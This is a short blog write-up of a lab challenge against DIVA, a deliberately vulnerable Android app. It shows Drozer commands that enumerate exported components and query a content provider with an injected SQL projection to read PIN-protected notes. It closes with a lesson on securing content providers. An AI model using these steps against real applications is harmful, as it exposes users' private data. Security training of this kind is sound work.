Authentication Based Access Control Issues
- Abhilasha
- Jul 12, 2024
- 1 min read
Challenge: Accessing PIN-Protected Notes Storage
Objective:
Bypass PIN-based authorization to access sensitive notes without knowing the PIN.
Tools:
Drozer: A tool for assessing the security of Android applications.
Steps: Step 1: Check Attack Surface sh Copy code dz> run app.package.attacksurface jakhar.aseem.diva Step 2: Find Accessible Content Providers sh Copy code dz> run scanner.provider.finduris -a jakhar.aseem.diva Step 3: Query the Content Provider to Access Notes sh Copy code dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/ --projection "* FROM notes;--"
Results:
3 activities exported
1 content provider exported
Conclusion
By using Drozer, we were able to identify and exploit an exported content provider to access sensitive notes stored in the DIVA app without needing the PIN. This demonstrates the importance of properly securing content providers and other components in Android applications.
Comments